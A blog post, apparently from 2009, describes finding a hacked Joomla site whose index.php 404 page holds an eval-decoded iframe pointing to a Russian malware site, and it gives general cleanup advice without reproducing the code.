I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.
(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!
He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.
The code is unescaped text using eval. It’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.
Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.

This hack has been mentioned online as early as 2007, and a year ago, and it’s been mentioned as serving malware, but this site was recently hacked, as far as I know. According to others who had that happen, the hack was done through php scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.
Here’s an analysis of who is behind this (Nov 2007)